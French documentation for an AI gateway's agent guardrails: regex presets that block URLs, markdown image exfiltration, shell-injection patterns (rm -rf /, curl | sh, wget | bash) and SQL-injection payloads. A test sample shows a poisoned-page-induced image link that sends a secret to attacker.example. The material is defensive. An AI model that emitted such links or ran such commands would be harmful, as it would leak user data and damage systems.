Guardrails agentiques

Quand un modèle pilote des outils, les chaînes dangereuses se cachent dans du contenu ordinaire : une URL que l’agent est sur le point de récupérer, une image markdown que le client chargera automatiquement, un rm -rf / que le modèle renvoie en écho dans un outil shell, un UNION SELECT qu’il émet pour qu’un runner SQL l’exécute. Une politique de contenu qui ne pense qu’à la PII ou aux secrets manque les quatre. La catégorie de presets Agent existe exactement pour cette forme — des règles regex déterministes qui bloquent la requête ou la réponse avant qu’un outil en aval n’agisse jamais dessus. C’est une page d’atterrissage ciblée sur le cas d’usage agentique. Pour le moteur de guardrail complet — chaque type de règle, champ, étape et route — voir la référence Guardrails.

1. Pourquoi les guardrails d’agent sont une surface distincte

Un guardrail filtre le contenu — le texte dans la requête et le texte dans la réponse. Pour un agent, ce texte devient une action : l’URL est récupérée, le markdown est rendu, la ligne shell est exécutée, le SQL est exécuté. Donc le même moteur block / mask que vous utilisez pour la PII fait double emploi ici — il arrête un payload à la passerelle avant que la couche d’outils de l’agent ne puisse le transformer en effet de bord. La catégorie Agent livre quatre presets, chacun une règle regex avec l’action block, répartis sur les deux étapes :

URL Filter — input, block

Bloque toute URL http(s) sur la requête. Utilisez-le pour les flux d’agent où les URL sortantes doivent être en liste blanche plutôt qu’ouvertes. Le motif semé fait correspondre toute URL ; modifiez la regex pour permettre des domaines spécifiques.

Markdown Image Block — output, block

Bloque les images markdown intégrées (![alt](url)) dans la réponse du modèle. Se défend contre l’exfiltration par rendu d’image sur les clients qui chargent automatiquement les images distantes — un canal de fuite de données classique où une URL d’image rendue fait sortir des données en contrebande.

Tool Call Shell Block — input, block

Bloque les motifs de shell-injection évidents dans la requête (rm -rf /, curl … | sh, wget … | bash, escalade sudo). Utilisez-le pour les flux d’agent qui peuvent transmettre l’entrée utilisateur dans un outil shell.

SQL Injection in Output — output, block

Bloque les réponses du modèle qui transportent des payloads de SQL-injection classiques (UNION SELECT, OR 1=1, DROP TABLE, terminateurs de commentaire). Défense en profondeur pour les outils qui exécutent automatiquement le SQL que le modèle a produit.

Deux presets filtrent l’entrée, deux filtrent la sortie. URL Filter et Tool Call Shell Block se déclenchent sur la requête — avant que le modèle ne tourne, avant qu’aucun quota ne soit mesuré. Markdown Image Block et SQL Injection in Output se déclenchent sur la réponse — après que le modèle a répondu, avant que le contenu n’atteigne votre client ou sa couche d’outils. Savoir sur quelle étape vit un risque est tout le jeu ; voir Étape input et Étape output.

2. Appliquer un guardrail d’agent dans la console

Chaque étape ici est une action de console sur la passerelle hébergée sous votre propre session. Créer et modifier des guardrails nécessite Developer+ dans l’espace de travail. Seul l’appel /v1/* final utilise une clé de relais sk-orca-... — le guardrail lui-même est entièrement configuré dans la console.

Ouvrir le template

Dans la console, ouvrez Guardrails, cliquez sur le split-button New guardrail, et choisissez un preset dans la catégorie de templates Agent — par exemple Markdown Image Block. Il sème la seule règle de block regex à la bonne étape.

Nommer et enregistrer

Donnez-lui un nom (≤ 64 caractères), par exemple agent-rails, et enregistrez. Un preset est une graine, pas un verrou — ajoutez les trois autres règles Agent ou modifiez la regex librement ensuite (voir §4).

Le tester dans le sandbox

Ouvrez l’onglet Test à l’intérieur de l’éditeur, collez un échantillon, choisissez l’étape correspondante, et exécutez la politique actuelle localement — aucun appel en amont, aucun quota (voir §3).

Attacher une clé

Modifiez une clé API et choisissez agent-rails dans la liste déroulante Guardrail (définit guardrail_id sur la clé), ou marquez-le comme défaut de l’espace de travail. Voir Attacher à une clé et Défaut de compte.

3. Prouvez-le avant d’attacher

Prouvez que la règle se déclenche avant qu’une clé ne pointe vers elle. Ouvrez l’onglet Test, choisissez l’étape output, et collez une réponse qu’une page empoisonnée par un attaquant aurait pu pousser le modèle à émettre :

Here is the result: ![status](https://attacker.example/track?d=secret)

Le sandbox évalue la politique actuelle localement — rien n’est envoyé en amont, rien n’est mesuré — et renvoie le verdict block nommant la règle qui s’est déclenchée. Pour une grille A/B contre un corpus d’échantillons adverses et bénins, le harnais d’évaluation vit dans l’onglet d’à côté.

4. Composer et ajuster les règles

Les quatre presets sont des graines. Le mouvement courant est de les combiner en un seul guardrail agent-rails et de resserrer chaque regex à votre stack :

Liste blanche d'URL

Partez de URL Filter, puis modifiez la regex pour qu’elle bloque chaque URL sauf vos domaines sanctionnés — inversez la correspondance en une liste blanche au lieu d’un block total.

Rédiger vos propres détecteurs

Ajoutez une règle regex pour toute forme de payload qui intéresse vos outils — motifs RE2, temps linéaire, sans backreferences. Les motifs compilent une fois et sont mis en cache à travers les requêtes.

Mélangez les règles Agent avec le reste du moteur dans un seul guardrail. Associez-les à une règle mask PII Shield ou à un block d’entrée Secrets Blocker — une politique peut porter chaque type de règle et le moteur les fond en un seul verdict. Voir Actions pour block vs. mask vs. flag.

5. À quoi ressemble un block

Chaque preset Agent utilise l’action block. Une requête bloquée renvoie une HTTP 400 avec le code d’erreur guardrail_blocked et un message nommant le guardrail et la règle qui s’est déclenchée :

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

Une requête bloquée ne coûte aucun quota — un block à l’étape input (URL Filter, Tool Call Shell Block) se déclenche avant la mesure ; un block à l’étape output (Markdown Image Block, SQL Injection in Output) rembourse le quota pré-consommé après le rejet de la réponse — et elle est marquée skip-retry, puisque ré-exécuter le même prompt ne ferait que bloquer à nouveau. Voir l’erreur guardrail_blocked.

Le block de sortie est appliqué en streaming aussi. Pour les deux presets Agent à l’étape output, block tient dans les deux cas : sur une réponse non-streaming, la réponse est filtrée avant son retour, et sur une réponse streaming, un scanner coupe le flux en plein vol avant que tout contenu bloqué n’atteigne le client. Voir Couverture du streaming.

6. Les guardrails, c’est du contenu ; le firewall, c’est les appels d’outils

Les guardrails d’agent sont une première couche solide, mais ils raisonnent sur des chaînes, pas sur la sémantique des outils. Ils bloquent une ligne shell dans le contenu — ils ne comprennent pas que le modèle a émis un tool_call structuré vers un outil destructeur, ou qu’une requête sortante se dirige vers une IP de métadonnées. Cette couche d’appels d’outils est le Firewall : il évalue les tool_calls émis par le modèle, les tools/call MCP et l’egress sortant avec des verdicts comme allow / audit / deny / pending_approval. Les deux se composent — les guardrails filtrent le texte, le firewall gouverne l’action.

Firewall

Gouvernez les appels d’outils émis par le modèle, les appels MCP et l’egress avec des verdicts allow / audit / deny / approbation.

Guardrails vs. Firewall

Quand recourir à un guardrail de contenu vs. un firewall d’appels d’outils — et comment exécuter les deux.

Sécuriser les agents IA

La pile de contrôle d’agent complète : contenu, outils, MCP et egress.

Agence excessive

La menace que ces rails traitent — un agent qui fait plus qu’il ne devrait.

7. Voir ce qui s’est déclenché

Chaque règle qui se déclenche enregistre une correspondance — type de règle, action, étape et une chaîne de détail — qui apparaît dans le flux Matches de l’espace de travail. La sous-chaîne correspondante elle-même n’est enregistrée que lorsque Log raw content est activé, ce qui est désactivé par défaut. Groupez et filtrez le flux par guardrail, type de règle et action pour surveiller le taux de déclenchement de vos règles d’agent et ajuster les faux positifs. Voir Flux des correspondances, Journalisation & confidentialité, et Ajuster les faux positifs.

8. Où aller ensuite

Règles à l'étape output

Comment le filtrage de réponse fonctionne pour Markdown Image Block et SQL Injection in Output.

Détecteurs regex

Rédigez vos propres motifs RE2 pour étendre les règles Agent.

Exfiltration de données

Le canal d’exfil que Markdown Image Block ferme.

Appels d'outils dangereux

Pourquoi un rail de contenu seul ne suffit pas — associez-le au firewall.

Les guardrails d’agent gardent les chaînes dangereuses hors du contenu qu’un agent envoie et reçoit. Pour gouverner les actions qu’un agent prend — les appels d’outils, les appels MCP et l’egress eux-mêmes — montez au Firewall et lisez le référentiel sécuriser les agents IA. Pour le moteur de guardrail complet, voir la référence Guardrails.

​1. Pourquoi les guardrails d’agent sont une surface distincte

​2. Appliquer un guardrail d’agent dans la console

​3. Prouvez-le avant d’attacher

​4. Composer et ajuster les règles

Liste blanche d'URL

Rédiger vos propres détecteurs

​5. À quoi ressemble un block

​6. Les guardrails, c’est du contenu ; le firewall, c’est les appels d’outils

Firewall

Guardrails vs. Firewall

Sécuriser les agents IA

Agence excessive

​7. Voir ce qui s’est déclenché

​8. Où aller ensuite

Règles à l'étape output

Détecteurs regex

Exfiltration de données

Appels d'outils dangereux

1. Pourquoi les guardrails d’agent sont une surface distincte

2. Appliquer un guardrail d’agent dans la console

3. Prouvez-le avant d’attacher

4. Composer et ajuster les règles

5. À quoi ressemble un block

6. Les guardrails, c’est du contenu ; le firewall, c’est les appels d’outils

7. Voir ce qui s’est déclenché

8. Où aller ensuite